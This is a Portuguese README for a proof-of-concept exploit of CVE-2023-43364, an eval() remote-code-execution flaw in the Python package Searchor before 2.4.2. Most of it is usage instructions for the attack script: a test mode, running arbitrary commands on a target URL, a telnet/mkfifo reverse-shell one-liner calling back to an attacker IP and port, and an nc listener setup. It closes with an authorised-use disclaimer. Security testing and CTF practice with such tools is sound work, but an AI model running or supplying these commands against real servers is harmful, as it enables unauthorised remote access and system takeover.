
Exploit POC via uso inseguro de `eval()` no Searchor (< 2.4.2)
Execução Remota de Código (RCE) por meio do uso inseguro de
eval()no Searchor (< 2.4.2)
Este projeto demonstra a exploração de CVE-2023-43364, uma vulnerabilidade de Execução Remota de Código (RCE) que afeta o pacote Python Searchor (< 2.4.2).
O problema é causado pelo uso inseguro de eval() em entrada controlada pelo usuário, permitindo que atacantes injetem e executem código Python arbitrário.
A vulnerabilidade foi corrigida com a remoção do uso inseguro de eval(), conforme mostrado no patch oficial:
Detalhes técnicos adicionais e aviso:
Esta prova de conceito fornece múltiplos métodos de execução, incluindo execução de comandos, validação de teste e shells reversas.
Execute um comando simples (id) para verificar a execução de código:
python3 CVE-2023-43364.py <URL> --test
Executar Comando Personalizado
Execute qualquer comando no servidor alvo:
python3 CVE-2023-43364.py <URL> -a "whoami"
Exemplos:
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"
Shell Reversa
Inicie um listener na sua máquina:
nc -lvnp 4444
Execute o exploit:
python3 CVE-2023-43364.py <URL> <LHOST>
Este projeto destina-se a:
O autor não se responsabiliza por qualquer uso indevido ou dano causado por esta ferramenta.
Use este exploit apenas em ambientes controlados ou em sistemas para os quais você tenha permissão explícita para testar